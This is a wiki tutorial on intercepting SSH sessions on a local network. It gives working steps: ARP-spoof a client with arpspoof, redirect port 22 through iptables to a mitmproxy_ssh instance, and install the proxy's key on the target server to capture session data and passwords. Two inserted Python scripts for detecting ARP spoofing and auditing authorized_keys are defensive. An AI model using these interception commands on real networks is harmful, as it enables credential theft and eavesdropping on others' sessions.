Difference between revisions of "MITM: mitm ssh"

From OnnoWiki
Latest revision as of 08:24, 7 April 2017

source: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html


Diagram

client --> mitmproxy --> ssh server


  • client IP: 192.168.0.106 (for example)
  • server IP: 192.168.0.100 (for example)


ARPspoofing

ARP spoof (run as root):

sudo su
arpspoof -t 192.168.0.106 192.168.0.100 >/dev/null &

Configure the firewall so that intercepted traffic can be NATed: enable forwarding and redirect incoming TCP port 22 to local port 2222, where the proxy will listen.

sudo su
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
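On the network side, the arpspoof step above leaves a tell-tale trace in every neighbour's ARP cache: one MAC address answering for two IP addresses, and a pinned host's MAC changing. The following Python script is an added example for detecting that pattern and is not part of the original page or of the mitmproxy project; the `ip neigh` sample, the MAC addresses, the 192.168.0.105 host and the pinned-MAC table are constructed assumptions.

```python
# Added example: flag ARP-cache symptoms of ARP spoofing (defensive check).
import re
from collections import defaultdict

# Constructed sample of `ip -4 neigh show` output. 192.168.0.100 is the SSH
# server from the page; 192.168.0.105 plays a second host whose MAC now also
# answers for the server's IP. All MACs are made up for this example.
SAMPLE_NEIGH = """\
192.168.0.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.0.100 dev eth0 lladdr aa:bb:cc:dd:ee:05 STALE
192.168.0.105 dev eth0 lladdr aa:bb:cc:dd:ee:05 REACHABLE
192.168.0.120 dev eth0 lladdr 00:11:22:33:44:20 DELAY
"""

# MACs a defender has recorded for critical hosts (assumed values).
PINNED = {"192.168.0.100": "00:11:22:33:44:64"}

LINE_RE = re.compile(r"^(\S+)\s+dev\s+\S+\s+lladdr\s+([0-9a-f:]{17})", re.I)


def parse_neigh(text):
    """Return {ip: mac} from `ip neigh` lines; entries without lladdr are skipped."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def find_shared_macs(table):
    """Return {mac: [ips]} for every MAC that answers for more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def find_pin_mismatches(table, pinned):
    """Return {ip: (expected_mac, seen_mac)} where the cache contradicts a pin."""
    return {ip: (mac.lower(), table[ip]) for ip, mac in pinned.items()
            if ip in table and table[ip] != mac.lower()}


if __name__ == "__main__":
    cache = parse_neigh(SAMPLE_NEIGH)
    print("shared MACs:", find_shared_macs(cache))
    print("pin mismatches:", find_pin_mismatches(cache, PINNED))
```

Replace SAMPLE_NEIGH with the real output of `ip -4 neigh show` to run the same checks on a live host.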

Download

cd /root/
wget https://github.com/saironiq/mitmproxy/archive/master.zip
unzip master.zip

Generate Keys

cd ~/mitmproxy-master/
./mitmkeygen

The keys will be stored in

~/.mitmkeys/

Install the SSH key on the server to be attacked

Copy it over:

ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver

Example:

ssh-copy-id -i ~/.mitmkeys/id_rsa.pub onno@192.168.0.100
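The ssh-copy-id step above works only because the proxy's public key ends up in the server's authorized_keys, so the server-side control is a periodic audit of that file against known key fingerprints. The Python script below is an added example (not from the page or the mitmproxy project): it parses authorized_keys lines, computes OpenSSH-style SHA256 fingerprints and reports keys missing from an allowlist. The key blobs and the sample file are constructed and are not usable keys.

```python
# Added example: audit authorized_keys for keys outside an allowlist.
import base64
import hashlib
import shlex

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256", "ssh-dss"}


def key_fingerprint(blob_b64):
    """OpenSSH-style fingerprint: SHA256 of the decoded blob, base64, no '='."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Return [(key_type, blob_b64, comment)]; blank/comment lines are skipped
    and an options prefix such as from="..." is ignored."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = shlex.split(line)
        for i, tok in enumerate(fields):
            if tok in KEY_TYPES and i + 1 < len(fields):
                entries.append((tok, fields[i + 1], " ".join(fields[i + 2:])))
                break
    return entries


def unexpected_keys(text, allowlist):
    """Return [(fingerprint, comment)] for keys not in the allowlist."""
    found = []
    for _, blob, comment in parse_authorized_keys(text):
        fp = key_fingerprint(blob)
        if fp not in allowlist:
            found.append((fp, comment))
    return found


def fake_blob(tag):
    """Constructed stand-in for a public-key blob; NOT a usable key."""
    body = b"\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x03\x01\x00\x01" + tag
    return base64.b64encode(body).decode()


ALLOWED_BLOB = fake_blob(b"admin-laptop")
ROGUE_BLOB = fake_blob(b"pushed-by-ssh-copy-id")

# Constructed sample file: two allowlisted entries and one foreign key.
SAMPLE_AUTHORIZED_KEYS = f"""\
# constructed sample
ssh-rsa {ALLOWED_BLOB} admin@laptop
from="10.0.0.0/8",no-pty ssh-rsa {ALLOWED_BLOB} admin@backup
ssh-rsa {ROGUE_BLOB} user@unknown-host
"""
ALLOWLIST = {key_fingerprint(ALLOWED_BLOB)}

if __name__ == "__main__":
    for fp, comment in unexpected_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print("unexpected key:", fp, comment)
```

The same fingerprints are what `ssh-keygen -lf` prints, so an allowlist can be built from the keys you actually issued.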

Run the proxy

Run the proxy, pointing it at victimserver.

cd ~/mitmproxy-master/
./mitmproxy_ssh -H victimserver
./mitmproxy_ssh -H 192.168.0.100 -s

This starts the proxy listening on localhost:2222.

Now simply connect to the local proxy:

ssh localhost -p 2222

And ta-da! You should see the raw data sent between client and server in the window where you ran mitmproxy_ssh.

Installation

$ sudo pip install twisted
$ sudo apt-get install python-service-identity
$ pip install pycrypto


If there is an error

./mitmproxy_ssh -H 192.168.0.100 -s
Server running on localhost:2222...
Original client connected to proxy server.
Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
   File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite
    why = selectable.doRead()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 209, in doRead
    return self._dataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 724, in dataReceived
    self.dispatchMessage(messageNum, packet[1:])
  File "/root/mitmproxy-master/mitmproxy/mitmproxy.py", line 1142, in dispatchMessage
    payload)
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 71, in log_packet
    self.output += func(payload)
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 278, in msg_kexdh_init
    mpints, payload = get_mpint(payload)
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 655, in get_mpint
    mpints.append(Util.number.bytes_to_long(
exceptions.AttributeError: 'module' object has no attribute 'number'

Client disconnected. 

This happens because the pycrypto package layout changed, so `Util.number` is no longer resolved; edit the file mitmproxy/mitmproxy/sshdebug.py as follows.

-- line 655: change it to
mpints.append(cnumber.bytes_to_long(
-- line 11: add
from Crypto.Util import number as cnumber

References